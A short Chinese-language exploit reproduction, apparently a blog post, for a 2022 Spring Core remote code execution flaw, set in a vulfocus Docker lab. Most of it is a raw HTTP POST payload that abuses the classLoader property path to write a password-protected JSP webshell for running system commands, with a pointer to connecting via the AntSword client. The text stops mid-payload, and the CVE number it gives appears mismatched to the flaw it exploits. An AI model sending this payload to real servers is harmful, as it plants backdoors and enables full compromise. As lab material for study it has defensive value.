漏洞信息
漏洞时间:2022-3-29
CVE编号:CVE-2022-22963
漏洞影响范围及条件:
1 | JDK 9 及以上版本 |
docker拉去镜像
我们直接docker拉去靶场环境即可,镜像名称:vulfocus/spring-core-rce-2022-03-29。
复现漏洞
靶场拉去后,访问靶场即可开始测试
首先抓包修改并添加exp:
发包后,连接蚁剑连接或web访问都可以
EXP
```
POST / HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 797
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22k3rwin%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]